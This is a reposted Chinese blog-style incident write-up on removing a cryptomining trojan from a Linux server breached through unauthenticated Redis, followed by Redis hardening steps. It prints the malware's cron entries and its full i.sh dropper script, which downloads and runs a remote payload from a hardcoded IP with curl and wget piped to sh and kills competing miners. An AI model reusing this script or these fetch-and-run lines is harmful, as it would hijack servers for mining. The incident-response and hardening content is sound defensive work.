当前位置:首页 > 健康 >

清除木马会删除文件吗(木马文件删不掉怎么办)

来源:原点资讯(www.yd166.com)时间:2022-12-18 00:17:24作者:YD166手机阅读>>

比特币涨的这么疯狂,其他各种币都跟着涨,各色的挖矿木马也是层出不穷,这不遇到了一个。来看看如何处理它。

在一次检查任务计划时发现两个自己未曾添加的任务

#crontab -l */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

觉得奇怪,删除任务计划,删除/var/spool/cron/crontabs/root里的内容,当我查看占用CPU资源进程发现有个wnTKYg进程很占资源,搜索发现是挖矿木马,挖挖挖…哇哇哇,有网友说wnTKYg是门罗币,待验证。
i.sh脚本内容如下:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root if [ ! -f "/tmp/ddg.2020" ]; then curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020 fi if [ ! -f "/tmp/ddg.2020" ]; then wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020 fi chmod x /tmp/ddg.2020 && /tmp/ddg.2020 #这家伙还挺奸的,把其他挖矿的木马给干了先,保证自己的挖矿木马充分利用资源,最大限度榨取肉鸡资源 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

发现木马那就得除掉它,先是ps -ef |grep “wnTKYg”,找出进程好,再pkill清除进程,再find / -name wnTKYg*查找文件,找到/tmp/wnTKYg,于是删除。以为大功告成,清除木马了,没想到,几分钟后又有wnTKYg进程出现,看来是有什么监控着状态,停止了就又启动。详细查看百度出来的文章,原来还有其他地方有任务计划在执行。 按网友的方法一一铲除。

1、清除服务器上的公钥配置,查看用户列表,删除表中陌生的帐号,先把熊孩子挡在门外,不能让他们再进来了。
查看/root/.SSH下的文件known_hosts,发现有不认识的IP,查看完直接清除.ssh下的文件,简单省事。

#rm -rf /root/.ssh/* #cat /etc/passwd #userdel 对应的用户名

2、清除任务计划,不然*掉的进程又重新运行了。

#crontab -e 删除下面两条任务计划 */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

查看/var/spool/cron目录下的任务计划,删除相关计划

3、清除对应进程及文件

#ps aux |grep "wnTKYg*" #pkill -9 进程号 删除这个后没多久就有启动了,看来有个守护进程,top继续查看进程,终于发现有一个/tmp/ddg.2020进程可疑,百度一下果然就是挖矿工的守护进程。 #ps aux |grep "ddg*" #pkill -9 进程号 接下来吧运行文件删除 #find / -name wnTKYg* #find / -name ddg* wnTKYg和ddg都是在/tmp下,只有/tmp下有这两文件,删了 #rm -rf wnTKYg #rm -rf ddg.2020

4、修复Redis的后门的缺陷
Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生,严重危害业务正常服务。
一旦入侵成功,Redis数据会丢失,攻击者可直接添加账号用于ssh远程登录控制服务器,会给用户的 Redis 运行环境以及 Linux 主机造成安全风险,引发重要数据删除、泄露或加密勒索事件发生。
入侵条件:redis服务对公网开放,且未启用认证。

a.在 redis.conf 文件中找到 “# bind 127.0.0.1” ,把前面的#号去掉,然后保存。注:修改后只有本机才能访问Redis,也可以指定访问源IP访问Redis,最好也更改服务端口,不使用默认端口。
# port 6379
# bind 192.168.1.100 10.0.0.1

b.设置访问密码 (需要重启redis才能生效)在 redis.conf 中找到“requirepass”字段,在后面填上你需要的密码,Redis客户端也需要使用此密码来访问Redis服务。
#requirepass !QE%^E3323BDWEwwwe1839

c.设置防火墙策略如果正常业务中Redis服务需要被其他服务器来访问,可以设置iptables策略仅允许指定的IP来访问Redis服务。
iptables -A INPUT -s x.x.x.x -p tcp –dport 6379 -j ACCEPT

d.修改Redis服务运行账号 (需要重启redis才能生效)请以较低权限账号运行Redis服务,并禁用该账号的登录权限。以下为创建一个无home目录和无法登陆的普通权限账号:
#useradd -M -s /sbin/nologin [username]

栏目热文

如何去掉木马病毒源头(如何彻底清除木马病毒)

如何去掉木马病毒源头(如何彻底清除木马病毒)

企业有了官网之后,往往会因为各种原因导致网站中木马病毒,要么页面被篡改,要么页面被挂马,乱七八糟的非法信息。如果不处理被...

2022-12-18 00:41:06查看全文 >>

木马病毒如何清理干净(如何彻底清除木马病毒)

木马病毒如何清理干净(如何彻底清除木马病毒)

首先介绍一下流氓病毒木马。“流氓软件”是介于病毒和正规软件之间的软件。计算机病毒指的是:自身具有、或使其它程序具有破坏系...

2022-12-18 00:31:54查看全文 >>

电脑木马病毒怎么清除(电脑木马怎么彻底清除)

电脑木马病毒怎么清除(电脑木马怎么彻底清除)

电脑病毒,是许多电脑拥有者心头之恨,病毒一入侵就会占用电脑的大量内存,自动修改我们的内存容量并自动消耗内存,严重时会导致...

2022-12-18 00:44:57查看全文 >>

最彻底的手机杀毒软件(最强手机杀毒软件)

最彻底的手机杀毒软件(最强手机杀毒软件)

相信大家看过“窃听风云”吧,手机明明在自己身上,而且还设有手机密码,有些事明明只用微信和一个人说过,却被第三者知道,满头...

2022-12-18 00:38:03查看全文 >>

怎样彻底解决木马病毒(木马病毒链接怎么清除)

怎样彻底解决木马病毒(木马病毒链接怎么清除)

大家好 我是周杰伦恶意代码的分类包括计算机病毒、蠕虫、木马、后门、Rootkit、流氓软件、间谍软件、广告软件、僵尸(b...

2022-12-18 00:00:57查看全文 >>

怎么清除顽固木马病毒(如何快速清除顽固木马)

怎么清除顽固木马病毒(如何快速清除顽固木马)

当下,各地复工复产已箭在弦上,这段日子,不少新冠病毒阳性感染者居家治疗后逐渐康复。但“阳过”们实在担心:家里的被子床单会...

2022-12-18 00:31:41查看全文 >>

什么软件不能清除木马病毒(如何彻底清除木马病毒)

什么软件不能清除木马病毒(如何彻底清除木马病毒)

  文 | 华商韬略 吴苏  很长一段时间里,杀毒软件都是装机必备,不管是瑞星、金山毒霸、360、江民,还是卡巴斯基、诺...

2022-12-18 00:14:17查看全文 >>

木马病毒怎么删除的(木马病毒怎样永久删掉)

木马病毒怎么删除的(木马病毒怎样永久删掉)

在计算机领域中,木马是一类恶意程序,具有隐藏性和自发性等特点,可用于进行恶意攻击。本节主要从木马的概念和结构、伪装手段等...

2022-12-18 00:01:19查看全文 >>

怎样能清除木马病毒(手机木马病毒清理)

怎样能清除木马病毒(手机木马病毒清理)

若您是“密接”,或不幸“中招”,成了新冠病毒感染者,需要居家观察和治疗时,以下小贴士,希望能帮到您。✓日常监测密切接触者...

2022-12-18 00:10:07查看全文 >>

木马病毒怎么清理教程(木马病毒链接怎么清除)

木马病毒怎么清理教程(木马病毒链接怎么清除)

你是否觉得自己不够漂亮?不够优秀?不够自律?你是否觉得自己没有天赋?没有自由?没有足够的钱?你是否觉得自己时常迷茫?时常...

2022-12-18 00:10:23查看全文 >>

文档排行